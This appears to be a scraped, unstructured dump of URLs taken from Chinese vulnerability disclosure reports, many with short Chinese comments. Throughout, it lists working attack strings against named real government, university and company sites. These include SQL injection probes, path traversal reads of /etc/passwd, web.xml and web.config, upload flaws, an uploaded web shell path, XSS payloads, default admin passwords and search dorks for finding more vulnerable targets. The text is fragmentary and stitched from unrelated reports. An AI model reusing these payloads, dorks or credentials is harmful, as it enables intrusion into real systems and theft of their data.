http://www.kinghighway.com:9000/WorkFlow/wf_work_form_save.aspx?office_missive_id=@@version http://oa.ruvar.com/WorkFlow/wf_work_form_save.aspx?office_missive_id=@@version http://oa.mingshiedu.com:801/WorkFlow/wf_work_form_save.aspx?office_missive_id=@@version http://116.204.107.145:9000/WorkFlow/wf_work_form_save.aspx?office_missive_id=@@version http://oa.gdjierong.com:8090/WorkFlow/wf_get_fields_approve.aspx?template_id=@@version http://www.kinghighway.com:9000/WorkFlow/wf_get_fields_approve.aspx?template_id=@@version http://oa.ruvar.com/WorkFlow/wf_get_fields_approve.aspx?template_id=@@version http://oa.mingshiedu.com:801/WorkFlow/wf_get_fields_approve.aspx?template_id=@@version http://116.204.107.145:9000/WorkFlow/wf_get_fields_approve.aspx?template_id=@@version 
http://oa.gdjierong.com:8090/WorkFlow/wf_office_file_history_show.aspx?id=1 http://www.kinghighway.com:9000/WorkFlow/wf_office_file_history_show.aspx?id=1 http://oa.ruvar.com/WorkFlow/wf_office_file_history_show.aspx?id=1 com:801/WorkFlow/wf_office_file_history_show.aspx?id=1 http://www.primeton.com/read.php?id=1802&his=1 http://www.qiaohu.com/news/index_ny.php?id=27957 http://shop.qiaohu.com/statistic/hou_tj_nowdaycountdaily.php http://edu.china-sss.com/ http://202.197.190.6:8016/ http://www.peiluyou.com:9999/offlinelogin?_act_=offLineLogin&pdtid=3&routerId=xxxxxx&uid=null http://edu.china-sss.com:100/ http://www.dxalxzfwzx.gov.cn/home/do_download.jsp?url=../../conf/tomcat-users.xml http://www.dxalxzfwzx.gov.cn/home/do_download.jsp?url=/home/do_download.jsp http://hezuo.sh.189.cn/Upload.aspx http://hezuo.sh.189.cn/Users/test.txt,经验证,此处上传没有文件类型限制。 http://hezuo.sh.189.cn/Users/adminadmin/test.jpg http://demo.cnnitc.com/inquiry.php http://demo.cnnitc.com/inquiry.php http://www.beyo.com.cn/beyo/uploads/,发现网站存在目录遍历漏洞,并存在有sql敏感文件; http://www.beyo.com.cn/admin/输入管理员的账户和密码可登录应用后台并编辑网站内容。 http://www.zk-jxt.com/ajax/getschoolcard.ashx?id=1 http://wooyun.org/bugs/wooyun-2014-059109) http://jwgl.hunnu.edu.cn http://www1.openedu.com.cn/ycjy/fengmian_new.php?id=447&mid=132&dbname=fengmain http://xiaoxi.yonyou.com/browser/ http://xiaoxi.yonyou.com/jmx-console进入。 URL:http://udp.ufida.com.cn/uDetail-p1.asp?flag=rjcp&seq_no=183【注入点】 http://udp.ufida.com.cn/utilityList.asp?mkname=KCGL&ud=20 http://udp.ufida.com.cn/plus_select.asp?flag=aa&udp_id=lxooo http://udp.ufida.com.cn/select_developerReg.asp?uid=uffans http://udp.ufida.com.cn/demoright.asp?page=2&uid=zyerp&company_name=%B1%B1%BE%A9%D7%F0%D3%D1%C8%ED%BC%FE%D3%D0%CF%DE%B9%AB%CB%BE inurl:asp?flag= inurl:seq_no= http://www.adsky.co.kr/qna_view.asp?seq_no=5219%27&pagenum=1333&srchN=&srchT=&srchC=&sval= 
http://www.redflagclub.com.hk/main06_a_as.asp?seq_no=184%27&desc=%EF%BF%BD%EC%B9%A2%EF%BF%BD%EF%BF%BD%EF%BF%BDu%EF%BF%BD%EF%BF%BDA%EF%BF%BD%7B%27 http://udp.ufida.com.cn/uDetail-p1.asp?flag=rjcp&seq_no=187 http://www.bioinfo.tsinghua.edu.cn/ http://www.bioinfo.tsinghua.edu.cn/wp-login.php http://jwjcc.bfsu.edu.cn/ http://jwjcc.bfsu.edu.cn/wp-login.php http://edu.china-sss.com/search.vip http://cloud.broadlink.com.cn/ip_sensor/index.php/home/get_forget http://209.116.186.246/#newwindow=1&q=intitle:%E6%A0%A1%E5%9B%AD+%E6%8A%80%E6%9C%AF%E6%94%AF%E6%8C%81%EF%BC%9A%E6%97%A0%E9%94%A1%E6%96%B0%E5%BA%A7%E6%A0%87%E6%95%99%E8%82%B2%E6%8A%80%E6%9C%AF%E6%9C%89%E9%99%90%E5%85%AC%E5%8F%B8 inurl:DPMA/FWeb/WorkRoomWeb/Web/Index.aspx?TID= http://209.116.186.246/#newwindow=1&q=inurl:DPMA%2FFWeb%2FWorkRoomWeb%2FWeb%2FIndex.aspx%3FTID%3D http://szxy.ncjy.net/DPMA/FWeb/WorkRoomWeb/Web/Index.aspx?TID=1000210106 http://club.1hai.cn/consult_detail.aspx?id=2 http://club.1hai.cn/consult_detail.aspx?id=2%27%20and%201=1%20and%20union%20select%201,2,3,4,5,6-- http://202.117.3.105:9000/LoginAction/loginLAction.action http://mba.cau.edu.cn/investday.php?id=1237 http://mba.cau.edu.cn/phpinfo.php http://xgb.lzu.edu.cn/WebSite/Web/NoticeInfo.aspx?Id=1321 view-source:http://www.zhanqi.tv/11305 www.zhanqi.tv","RecUrl":"http:\/\/vod.cdn.zhanqi.tv\/hls\/review\/UvDAFT08wb\/playlist.m3u8"},"follows":167,"onlines":6317,"notice":"\u6700\u6fc0\u70c8\u7684\u601d\u60f3\u98ce\u66b4 rtmp://fhlive.78diy.com/fhlive http://www.wodreamworks.com/index.php http://fmg.2014.sohu.com/ http://fmg.2014.sohu.com/webadmin http://www.sast.org.cn/admin/login.php http://www.sast.org.cn/index.php?part_id=128&category=2 http://www.otxx.net/Login.aspx?APPSecret= http://threeoa1.dhu.cc/us/user/get_password.jsp http://wifi.huazhu.com:8005/zh/home/index?ip=192.168.66.94&mac=28:18:78:cf:40:b9&ncip=192.168.50.200&ncport=80&siteid=50010621000514&sitename= 
http://wifi.huazhu.com:8005/zh/Finish/Success/18821268198/2002311/31011221020021/60:45:bd:e1:53:dc/login http://www.phpshe.com http://127.0.0.1:8081/router.cfg?Submit=%E4%BF%9D%E5%AD%98%E9%85%8D%E7%BD%AE http://112.93.35.124:8081/router.cfg?Submit=%E4%BF%9D%E5%AD%98%E9%85%8D%E7%BD%AE http://www.njjg.gov.cn:81/ http://127.0.0.1:8081/tmp/router_conf.tgz http://112.93.203.217:8081/tmp/router_conf.tgz db.zju.edu.cn/s/test/download.php?id=1 http://db.zju.edu.cn/s/forums/ http://oa http://oa http://www.peiluyou.com:9999/setconnectionsettings?_act_=setConnectionSettings&pdtid=3 http://www.peiluyou.com:9999/getconnectionsettings?_act_=getConnectionSettings http://www.bit-service.com/index.html inurl:xmlpzs http://www.x***.gov.cn/ http://www.b***dc.com.cn/ http://www.k***dc.cn/ http://www.l***g.com.cn/ http://www.***gj.cn/ http://www.pde.ecnu.edu.cn/admin/login.aspx http://www.tjredcross.org/zdbd.asp?id=1219 http://bbs.hintsoft.com.cn/bbs/admin.php www.ecs.cn http://wooyun.org/bugs/wooyun-2014-065656 http://www.shnotary.gov.cn/ http://www.shnotary.gov.cn/notarial/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=FileUpload&Type=File&CurrentFolder=/../ http://www.shnotary.gov.cn/notarial/UserFiles/ http://www.shnotary.gov.cn/platformData/ http://zhaosheng.xaufe.edu.cn/zhaosheng/show.asp?id=181 http://218.26.4.169:6286/aicberm/loginAction!login.action http://wap.kuwo.cn/wap/wap/Model?id=77&qq-pf-to=pcqq.group http://zf.huanle.qq.com/cgi-bin/hlddz_box/hlddz_open_box?callback=jsoncallback http://xsc.jlu.edu.cn/ http://xsc.jlu.edu.cn/wp-login.php,用户名和密码都是yjzx,管理权限。解决方法是强壮口令就可以了,比如密码设置为数字和字母混合。 http://www.zdvictory.com/ http://www.zdvictory.com/a/chanpinzhongxin/chenggonganli/list_10_1.html inurl:/website/dflz/ http://dflz.shanwei.gov.cn/website/dflz/dflzSiteAction.action http://dflz.meizhou.gov.cn/website/dflz/dflzSiteAction.action http://dflz.maoming.gov.cn/website/dflz/dflzSiteAction.action 
http://www.cwgk.gz.gov.cn/website/dflz/dflzSiteAction.action http://219.129.166.87/website/dflz/dflzSiteAction.action http://dflz.zhaoqing.gov.cn/website/dflz/dflzCjAction.action?orgCode=4412230112&orgName=%D3%C0%C7%E0%B4%E5 http://ygnl.szdflz.gov.cn/website/dflz/dflzXianjAction.action?orgCode=140601&orgName=%CB%B7%B3%C7%C7%F8 http://dflz.sg.gov.cn/website/dflz/dflzCjAction.action?orgCode=4402040101&orgName=%B2%E8%C9%BD%BE%D3%C3%F1%C7%F8 http://119.145.255.2:8081/common/jsp/file.jsp http://202.104.136.25 http://202.104.136.25/common/jsp/file.jsp inurl:MoralsView.asp http://www.zsguyi.net/MoralsView.asp?id=10%27 http://lmk.xhqedu.gov.cn/MoralsView.asp?id=17%27 http://sy.xhqedu.gov.cn/MoralsView.asp?id=38%27 http://www.zhongke666.com/MoralsView.asp?id=25%27 http://www.gtxy.cn/xsc/sgzx/MoralsView.asp?id=22%27 http://hlyx.ez.e21.cn/MoralsView.asp?id=19%27 http://www.hcjszx.com/MoralsView.asp?id=29%27 http://www.gfkqzx.com/MoralsView.asp?id=24%27 http://www.zcvc.cn/dgb/MoralsView.asp?id=23%27 http://50jy.com/MoralsView.asp?id=44%27 http://www.ztrdzx.com/MoralsView.asp?id=9%27 http://jx.jxyjxy.net/MoralsView.asp?id=15%27 http://www.hsjyzx.com/school1/MoralsView.asp?id=14%27 http://www.aflc.com.cn/xfjs/MoralsView.asp?id=19%27 http://www.linxisz.com/MoralsView.asp?id=62%27 http://222.24.19.31/织梦系统,sql注入加遍历目录,这里就不说了,漏洞已经帮你修复了,我就只截个图作为证明 http://zcgs.xupt.edu.cn/mtce/ http://jyc.xiyou.edu.cn/ http://lib.xupt.edu.cn/announce/article.asp?id=160 http://lib.xupt.edu.cn/xysh/bbs/login.asp http://tg.xiyou.edu.cn和http://222.24.19.104存在注入漏洞 http://etc.jlu.edu.cn/wordpress/ http://etc.jlu.edu.cn/wordpress/wp-login.php,用户名和密码都是admin,管理权限,解决方法是强壮口令就可以了,比如密码设置为数字和字母混合。 http://www.ixingmei.com/.svn/entries http://www.qioa.cn/) http://www.ttyoa.com/OA/XiaoShou/XiaoShouLeiXing/MainFrame.jsp?nCurPage=1&OrderBy=ID&IfDesc=desc&MingCheng=ad&ShuoMing= http://www.ttyoa.com/OA/XiaoShou/GenZongJiLu/HDJL.jsp?Type_Id=1&nCurPage=1&HDSJ2=2014-06- 
http://www.ttyoa.com/OA/XiaoShou/DuiXiangXinXi/KFXX.jsp?Type_Id=1&nCurPage=1&KFMC=asd&OrderBy=ShengRi&QuanXian=true http://www.ttyoa.com/OA/KaoQin/LeiXing/MainFrame.jsp?nCurPage=1&OrderBy=ID&IfDesc=desc&MingCheng=sada&ShuoMing= http://www.ttyoa.com/OA/KaoQin/KaoQinMingXi/main.jsp?nCurPage=1&OrderBy=RiQi&Nian=2014&Yue=06&KaoQing_KS=2014-05- http://www.ttyoa.com/OA/XiaoShou/XiaoShouLeiXing/MainFrame.jsp?nCurPage=1&OrderBy=ID&IfDesc=desc&MingCheng=ad&ShuoMing= http://www.ttyoa.com/OA/XiaoShou/GenZongJiLu/HDJL.jsp?Type_Id=1&nCurPage=1&HDSJ2=2014-06- http://www.ttyoa.com/OA/XiaoShou/DuiXiangXinXi/KFXX.jsp?Type_Id=1&nCurPage=1&KFMC=asd&OrderBy=ShengRi&QuanXian=true http://www.ttyoa.com/OA/KaoQin/LeiXing/MainFrame.jsp?nCurPage=1&OrderBy=ID&IfDesc=desc&MingCheng=sada&ShuoMing= http://www.ttyoa.com/OA/KaoQin/KaoQinMingXi/main.jsp?nCurPage=1&OrderBy=RiQi&Nian=2014&Yue=06&KaoQing_KS=2014-05- inurl:user.php?act=get_password&uid= http://class.enfamily.cn/user.php?act=get_password&uid=277576&code=09d77a40ca80fdfbd33315131e554bb0 http://www.yofus.com/user.php?act=get_password&uid=666167&code=e32d1180abe40484c2c3743e2393e5b0 http://www.ziai168.com/user.php?act=get_password&uid=9086&code=f19cea38ba7af425a8d3eea5a0c4beb4 http://shop.careland.com.cn/user.php?act=get_password&uid=9163183&code=cad8dd2c08a321666e0da6a5bcc56e85 http://www.cngrain.org/read.php?id=732 http://60.247.21.66:8085/ http://www.xingmeng.com/recruit/anchor http://app.bbs.ifeng.com/dkjs/data.php?callback=jsonp13982364133&order_by=12 http://219.148.63.54:8080/jsp/main.jsp http://www.jvw.gov.cn url:http://bbs.teamcen.com/index.php?ac=index_info&bid=8&m=bbs&id=48#reply http://www.ttyoa.com/OA/Bank/KaiHu/MainFrame.jsp http://www.ttyoa.com/OA/CaiWuGuanLi/XiangMuGuanLi/MainFrame.jsp http://www.ttyoa.com/OA/CaiWuGuanLi/YuJiCaiWuShouRu/CWSR.jsp http://www.ttyoa.com/OA/ShuiWuGuanLi/FaPiaoGouMai/CWSR.jsp http://www.ttyoa.com/OA/ShuiWuGuanLi/FaPiaoKaiJu/CWSR.jsp?Type_Id=1&nCurPage=1&XM_ID=&FuKuanDanWei=&YJKS1=2014-01- 
http://demo.taou.com http://demo.taou.com/xhb http://www.mimi.ai/ios/ios_internal.plist http://demo.taou.com/web/dialogs http://www.zjgjzy.gov.cn/zjg_aqsgba/zjg_aqsgba/pages/login.aspx?URL=Index2.aspx http://mp.weixin.qq.com/mpres/htmledition/res/wx_sample.zip https://code.google.com/p/svnmaia/,通杀所有版本。 http://demo1.515158.com/login.php http://oa.515158.com/index.php http://t4.m1905.com/(变形金刚4官网) http://passport.youku.com/user/loginReturn?callback=alert%28/wooyun/%29 http://mail.aodacn.com/nmc/cgi/index.cgi登陆后台 http://mail.aodacn.com/nmc/cgi/ann.cgi?__mode=edit_ann&sid=gcipW8QUgtZsKVRpHWPKcFtjadministrator-aodacn_com&ann_id=47&screen=edit_ann.html http://xwb.sdpec.edu.cn/sdadgei/display.php?id=503 http://deoa.sany.com.cn/names.nsf/$users http://deoa.sany.com.cn/names.nsf/defaultview http://game.coolpad.com/gameWeb/search_YxSearchAction.do http://game.coolpad.com/gameWeb/shell.jsp http://vod.qq.com/ http://221.233.24.55/login.jsp http://221.233.24.55/common/shell/ http://221.233.24.55/common/shell/BillBack.sh http://app.navi.baidu.com/peccancy/search?citys=SX_XA&rn=100&source=1®istno&engineno&pk_id=719684&carno=车牌号&pn=0&classno=车架号&type=2 http://www.quantian.com/WEB-INF/web.xml http://www.kmdc.gov.cn:80/dep/gzbm_aqscjdklj/list.ashx?id=1 http://www.kmdc.gov.cn:80/gov/list.ashx?id=1 http://www.kmdc.gov.cn:80/dep/bmgl_qrmjcy/list.ashx?id=1 http://www.kmdc.gov.cn:80/dep/gzbm_jtj/list.ashx?id=1 http://www.kmdc.gov.cn/dep/gzbm_aqscjdklj/show.ashx?id=82874 http://dc.km.gov.cn/dep/gzbm_aqscjdklj/list.ashx?id=20981&typeId=0&page=34 http://www.kuaida.net/ http://www.kuaida.net/vip/View.aspx?id=6XXXX就可以遍历了,其中id后面的数据我是根据主页上的“最新订单”构造的,经测试,id取61000-63716之间的都可以成功遍历,不知道是不是还有别的构造id数值的方法来遍历更多的用户信息~~ http://www.gatzs.com.cn//gatyz/fjms/layouts/utf8Layout.jsp?location=../../WEB-INF/web.xml%3f%2500.jpg http://manager.99114.com/ http://jiankang.baidu.com/ http://demo.oa8000.com/为例, user:123456 http://demo.oa8000.com/OAapp/WebObjects/OAapp.woa/wa/TraceOpenPage 
http://enjoyty.bjtelecom.net/user/initLogin.do http://3g.bj.ct10000.com/news/showNews.do http://demo.oa8000.com/为例, user:123456 http://demo.oa8000.com/OAapp/bfapp//buffalo/oaPubptUploadService inurl:homepage/common/ http://eol.yzu.edu.cn/eol/homepage/common/opencourse/scriptsearch.jsp?folderid=0&lid=31792&_style=page1 http://eol.aku.edu.cn/eol/homepage/common/opencourse/scriptsearch.jsp?folderid=0&_style=aktc&lid=11918 http://wlkc.njust.edu.cn/eolenv/homepage/common/opencourse/scriptsearch.jsp?folderid=0&_style=nust&lid=1149 http://teach.hnnu.edu.cn/homepage/common/opencourse/scriptsearch.jsp?folderid=0&_style=hnnu&lid=11633 http://eol.yzu.edu.cn:80/ http://www.kdmchina.org/downHelpServlet?fileName=../../../../../../../../../../etc/passwd http://ku.7k7k.com/index.php?type=1&page=1 http://115.182.59.75 inurl:news_show.php inurl:art_id http://www.ahduji.gov.cn:80/news_show.php http://action-collect.coolyun.com http://action-collect.coolyun.com/logs/ http://action-collect.coolyun.com/webpage/hotnews.html http://action-collect.coolyun.com/myadmin/ inurl:cms/template/InfoShowDefault.jsp http://www.wooyun.org/bugs/wooyun-2014-065701/trace/21f36bd00affa3de5b0f652798b59edc/code http://mall.juneyaoair.com/member/checkOrderInfo.jspx?receiverInfoId=11470&receiver=&province=&city=&hometown=&detailAddress=&tel=&shipmentDate=%E5%B7%A5%E4%BD%9C%E6%97%A5%E6%88%96%E5%8F%8C%E4%BC%91%E6%97%A5%E5%85%A8%E5%A4%A9%E5%80%99%E9%85%8D%E9%80%81&remark= http://” https://"。从效果上来看,这种方法到现在还是非常凑效的。 http://cksource.com/ckfinder/demo http://www.nths.cn/webschool/News/news_list.jsp?siteId=0&typeId=news61 http://try.lenosoft.net/bsdepot/为例, http://try.lenosoft.net/bsdepot/public/del_backup.asp?filename=../../bsdepot/images/login_01.jpg http://try.lenosoft.net/bsdepot/images/login_01.jpg http://wooyun.org/bugs/wooyun-2010-065537!毕竟我这个本身是防注入的。。好了 http://74.125.227.77/#newwindow=1&q=+%E6%8A%80%E6%9C%AF%E6%94%AF%E6%8C%81%EF%BC%9A%E9%91%AB%E5%8D%93%E7%BD%91%E7%BB%9C 
http://www.chriscn.com/Product.asp?BigClassName=%BD%C7%B7%A7%CF%B5%C1%D0 http://www.hzoccc.com/Product.asp?BigClassName=%B0%E1%D4%CB%B3%B5%CF%B5%C1%D0 http://fdafetreqwe.gotoip55.com/Product.asp?BigClassName=%C6%FB%B3%B5%EE%D3%BD%F0%CF%B5%C1%D0 http://www.cxaide.com/Product.asp?BigClassName=%C8%A1%C5%AF%C6%F7%CF%B5%C1%D0 http://www.blpack.com/Product.asp?BigClassName=%C6%FB%B3%B5%EE%D3%BD%F0%CF%B5%C1%D0 http://www.ygstw.com/Product.asp?BigClassName=%B7%C0%B7%E7%B7%C0%BA%AE%B9%A4%D7%F7%B7%FE http://www.nbrrd.com/Product.asp?BigClassName=%C6%FB%B3%B5%EE%D3%BD%F0%CF%B5%C1%D0 http://e.meituan.com/ http://www.chaohu.gov.cn/template/search.aspx?seachKey= http://www.chaohu.gov.cn/template/gov_leader_list.aspx http://www.hdx.gov.cn/hdzf/newsinfo.aspx?id=44041 http://wmw.henu.edu.cn/wp-login.php,用户名和密码都是wmwadmin,管理权限。漏洞修复:强壮一下用户密码就可以了,比如字母与数字混合,问题不大。 http://itest.yoka.com/ques.php?id=2087加'直接跳转回前台。。然后我利用了sqlmap进行get注入试了下! http://itest.yoka.com/ques.php?id=2087 http://sqlmap.org http://189.cn/dqmh/userCenter/bmhelp.do?method=pUK&phonenumber=手机号 inurl:NewsView.asp http://74.125.227.77/search?q=inurl:NewsView.asp&newwindow=1&ei=eoyiU5zSOOfQ8AGzwIHoBw&start=110&sa=N&biw=1366&bih=615 http://www.mhwmm.com/Ch/NewsView.asp?ID=4684 http://www.mhwmm.com/Ch/NewsView.asp?ID=4684 http://sqlmap.org http://m.lashou.com/dobuy2.php?id=8284503&fr=0&city=shanghai&vt=3 http://loan.xszz.gov.cn/2014/ http://yxzy.hrbmu.edu.cn:8080/cjxy/contentPage.php?news_id=243 http://asksheweb.hrbmu.edu.cn/article.php?id=1710 http://yxzy.hrbmu.edu.cn:8080/cjxy/admin/ http://www.37wan.net/content.php?id=63 http://ka.weibo.com/index.php/request/send/9392 http://www.leavesongs.com/other/weibo.html http://bsxt.gdbs.gov.cn/OuterNetWeb/appMain?service=work&func=applyAcceptEdit&controlSeq=数字 http://mall.juneyaoair.com/member/deltReceiver.jspx?id=11500 www.appstar.com.cn www.juneyaoair.com http://f.game.tom.com/admin.php http://f.game.tom.com//horind.php inurl:message.aspx?source,或inurl:contenttxt.*aspx 
http://www.yzsgjj.gov.cn/message.aspx?source= http://msi.shmtu.edu.cn/wp-login.php http://cie.shmtu.edu.cn/wp-login.php http://cyl.shmtu.edu.cn/wp-login.php http://58.40.126.130/ 9797168.com/admin存在后台管理登陆页面,开始尝试简单密码登陆,admin默认密码登陆成功,进入网站后台,可以配置本地网站。 http://122.144.129.126:8888/login http://xc.youja.cn:9025/uplus-cr-http/ id:22783试试 http://www.sanfu.com/?mod=ucp&do=orderlist&action=close&order_id=22783 http://www.qlcg.gov.cn/ http://www.qlcg.gov.cn/data/ inurl:ShowNews.php http://74.125.227.77/#newwindow=1&q=inurl:ShowNews.php http://www.6161.com.cn/shownews.php?id=1473 http://www.tpebus.com.tw/newsfile/shownews.php?newsno=476 http://www.cuiyueli.com/news/shownews.php?newsid=21 http://shanxi.gjsy.gov.cn/fwzn/201310/W020131230336029952189.doc http://bc.ifeng.com/c?db=ifeng&bid=16277,15962,3436&cid=2501,59,1&sid=33869&advid=349&camid=3546&show=ignore&url=http://www.18023.com http://cosmetics.ifeng.com/static/edit/ckfinder/ckfinder.html http://cosmetics.ifeng.com/datas/uploadimage/2014-06/21/files/2014_06_21_1403362625.jpg/1.php www.tax861.com.cn/articles/content.jsp?id=1203577855975 http://diantai.ifeng.com/webcall/pp.php?t=p&aid=104878&pf=public&s=renren https://www.google.ae/#q=%E6%8A%80%E6%9C%AF%E6%94%AF%E6%8C%81:56628124+56626870 http://cwgk.ts.gov.cn/news.aspx?newsid=68807 http://xzfw.maoming.gov.cn/html/fwtd.html?cT=32 http://wsbs.maoming.gov.cn/portal/department/department!detail.action?hot=3&orgId=219016&tz=1 http://gcgk.maoming.gov.cn:8088/html/print?cT=tbl_cCT_XMBA&ID=43 http://www.hbsz.gov.cn/rfb/Content.aspx?newsid=11985 http://www.tljq.gov.cn/newslist.aspx?cateid=2e40f9ae-b2b9-4001-857f-40b7e26c9fa0 http://r.cnc.qzone.qq.com/cgi-bin/user/cgi_tmp_talk?qzone_uin=20737302&to_uin=569550119&g_tk=1593160781 http://www.phpcms.cn/ http://www.hbwsjs.gov.cn/adglif/css.jsp bdfc:d6c3:6926:8de7%13]:80 e92e:254c:46d3:e439%11]:80 http://www.kxmail.net/Customer/index.html http://mail.pushmold.com为例,在找回密码处, http://mail.pushmold.com/prog/get_passwd.php 
http://mail.pushmold.com/prog/get_passwd.server.php http://110.76.39.112:8080/szairmiddle/notification.do http://223.100.156.147/ http://www.win2.cn/Question.aspx?name=33 http://www.hipuro.com/products/index.aspx?mid=193(这里是mid参数木有过滤) www.hipuro.com http://www.hipuro.com/webmanage/Login.aspx http://web.toutiao.com/user/3344263360/ http://mp.toutiao.com/ http://oa.kjkd.com/使用万能密码可直接登录,登录后发现资源下载页面下载链接没有验证,下载到的web.config发现oracle账号,可以登录。 http://www.jhfgj.gov.cn/js/ http://www.lzrc.gov.cn/ http://www.jsychb.gov.cn/Article/js/4271/index.html http://zb.upc.edu.cn/lc/book/img/5446/index.html http://jwc.sqnc.edu.cn/UploadFile/2426/index.html http://jwc.gzhu.edu.cn/Editor/Edit/face/1133/index.html http://gh.wzu.edu.cn/en/images/9585/index.html http://zsxx.hntbc.edu.cn/Flash/Page/8498/index.html http://dag.cust.edu.cn/upload/GALLERY/7621/index.html http://lib.wtu.edu.cn/html/special/2006/5328/index.html http://zjswater.gov.cn/ContentDetail.aspx?typeid=9&sid=37 http://fxkh.pearlwater.gov.cn/ContentSubList.aspx?typeid=1&sortid=15 http://www.gdxjwater.cn/SurveyResult.aspx?id=1 inurl:frim/index1.htm inurl:frim/index2.htm inurl:frim/index3.htm inurl:frim/index4.htm inurl:frim/index5.htm inurl:frim/index6.htm http://www.neihanshequ.com/joke/new/ http://bbs.qibosoft.com/down2.php?v=hy1.0#down http://bbs.qibosoft.com/down2.php?v=photo1.0#down http://douco.com/ http://demo.douco.com/ http://bbs.qibosoft.com/down2.php?v=news1.0#down http://xxcx.jnu.edu.cn/ http://xxcx.jnu.edu.cn/wp-login.php http://demo.cuumall.com/ http://demo.cuumall.com/index.php/home/userinfo/chgrejpro/id/197 http://demo.cuumall.com/index.php/home/userinfo/chgrejpro/id/196 http://demo.cuumall.com/ ps:545就是我第二号的UID。 http://81.chinacourt.org/public/detail.php?id=203 http://222.66.142.20/ehr/ http://210.41.192.73:8081/ncre/Login!input.action http://210.41.192.73:8081/Silic.jsp http://www.nipic.com/show/10458044.html http://down.nipic.com/ajax/download_go http://www.4008107107.com/ 
http://analysis.tuniu.com/ta_cookie_script.php?visit_url=http%3a%2f%2fwww.tuniu.com%2fu%2forderdetail%2f3478187%23tourist_info http://www.huazhu.com/forum/topic-1876669 http://bmall.163.com/script/buyer/product_list/list_type___2/?product_keywords=%22%3E%3Cscript%3Ealert%28/wooyun/%29%3C/script%3E http://oa.china-sss.com/defaultroot/download_old.jsp?path=..&name=x&FileName=WEB-INF/web.xml http://oa.china-sss.com/defaultroot/netdisk/download_netdisk.jsp?path=1&fileName=../../WEB-INF/web&fileExtName=xml&fileSaveName=x http://oa.china-sss.com/defaultroot/information_manager/informationmanager_download.jsp?path=..&FileName=WEB-INF/web.xml&name=x http://oa.china-sss.com/defaultroot/download_netdisk.jsp?path=1&fileName=../../WEB-INF/web&fileExtName=xml&fileSaveName=x http://oa.china-sss.com/defaultroot/wage_manager/download_wage_excelMode.jsp?fileRealName=x&fileSaveName=../../WEB-INF/web.xml http://oa.china-sss.com/defaultroot/dossier/dossier_import.jsp http://oa.china-sss.com/defaultroot/govezoffice/custom_documentmanager/smartUpload.jsp?path=..&mode=add&fileName=hello.jsp&saveName=hello.jsp&tableName=hello.jsp&fileMaxSize=0&fileMaxNum=null&fileType=jsp&fileMinWidth=0&fileMinHeight=0&fileMaxWidth=0&fileMaxHeight=0 http://oa.china-sss.com/defaultroot/public/edit/admin/login.jsp http://oa.china-sss.com/defaultroot/public/edit2/admin/login.jsp http://oa.china-sss.com/defaultroot/outMailLoginCheck.jsp?userAccount=&outMailRandom= http://zsjy.hebtu.edu.cn/zhaosheng/dk2014/ http://zsjy.hebtu.edu.cn/zhaosheng/dk2014/test.asp http://127.0.0.1/cookie.asp?fuck=1 http://riyongp.3g518.com/enterprise.asp?regid=191903 http://www.hkl.com.cn/problem.asp?regid=185573 http://hb.189.cn/login/ http://tools.52pk.com:8088/CF30/CF_Order.aspx?TypeId=4【注入点】 http://tools.52pk.com:8088/CF30/CF_Order.aspx?TypeId=2 http://tools.52pk.com:8088/Manager/Update/ToolWeb_Update_Mes.aspx?ToolId=1 http://tools.52pk.com:8088/Manager/Update/Update_iFrame.aspx?ToolId=1 
http://plus.aili.com/product.php?keyword=&nums=10'&channel=pro_shehua&jsonpcallback=jsonp1403449954995 http://mail.autohome.com.cn/, cn:67996056by http://safe.corpautohome.com/FindPwd.aspx,然后谷歌搜索顶级域名corpautohome.com,发现VPN平台https://ssl.vpn.corpautohome.com。 http://10.168.0.140/ https://10.168.0.82:8080/test/x.jsp http://edp.rbs.org.cn/news_show.php?id=303 http://u.ttpod.com/phone.do?method=downByModel&platformId=201012301134067952&phoneName=Nexus%20One&ch=hotPhone http://v1.ard.update.itlily.com:80/phone.do?method=downByPlatform&platformId=201012301134845294&ch=welcome https://www.ruby-lang.org/en/news/2013/11/22/heap-overflow-in-floating-point-parsing-cve-2013-4164/ http://www.rapid7.com/db/modules/auxiliary/dos/http/rails_json_float_dos http://119.90.40.135/console/manage/index.aspx?pagesize=10&pagenum=20 https://code.csdn.net/snippets/398903 http://www3.sdufe.edu.cn/ppMyAdmin/ http://passport.csdn.net/ajax/accounthandler.ashx?t=log&u=testuser&p=testpasswd&remember=0&callback=csdn.login_back&r=1403065352217 http://ct.ctrip.com/crptravel/index.aspx http://125.39.222.84/ http://125.39.222.180/ http://125.39.222.170/ https://yp.bianfeng.com/dashboard/h/login.html http://58.48.109.80:8012/selDept.php http://58.48.109.80:8012/userlist.php,导致几千用户名泄露,然后通过http://58.48.109.80:8012/check.php进行破解,破解出太多用户密码了,内部大量信息泄露,就不详述了。 http://manage.ncjy.net/cms/web/downloadFiles.jsp?file=C:\WINDOWS\system32\cmd.exe http://manage.ncjy.net/cms/web/downloadFiles.jsp?file=C:\Program http://www.cufe.edu.cn/cms/web/downloadFiles.jsp?file=/home/cms61/tomcat6.0.33/webapps/publish/gfjjyglyjy/docs/2011-10/20111028132433306450.pdf http://www.cufe.edu.cn/cms/web/downloadFiles.jsp?file=/home/cms61/tomcat6.0.33/webapps/cms/web/downloadFiles.jsp www.hztele.com.cn/manage/login.jsp www.hztele.com.cn/bbs ip:6868/login ip:28017 http://3g.ganji.com/ http://tuanwei.xjtu.edu.cn/index.php/Zixun/contentshow/id/2206.html http://sef.xjtu.edu.cn/news_content.asp?id=2074 http://zupei.xjtu.edu.cn/admin/Login.asp 
http://zupei.xjtu.edu.cn/admin/admin.asp http://www.jhwczj.gov.cn/newsinfo.jsp?id=1081 www.jhwczj.gov.cn http://www.nanhai.gov.cn/cms/jsp/shequ/show_info.jsp?sid=01011 http://www.nanhai.gov.cn/cms/jsp/shequ/show_info.jsp?sid=01011 http://www.cdedu.gov.cn/participation/SecretaryHall.aspx?id=22 http://t.hexun.com/p2/grouphomesearch.html?firstLetter=Y www.sxazj.gov.cn/download.jsp?path=../WEB-INF/web.xml www.nqs.gov.cn/cms/web/download.jsp?FileUrl=web/download.jsp http://www.heyuan.gov.cn/do_download.jsp?path=/do_download.jsp rd.heyuan.gov.cn/do_download.jsp?path=/do_download.jsp http://www.lntour.gov.cn/load.jsp?path=../WEB-INF&file=web.xml http://www.zscj.gov.cn/DownFile/OpenFile.aspx?XFileName=../web.config&FileName=web.config www.zsoaf.gov.cn/DownFile/OpenFile.aspx?XFileName=../web.config&FileName=web.config http://bbs.nbdl.gov.cn/down.aspx?path=web.config&fname=web 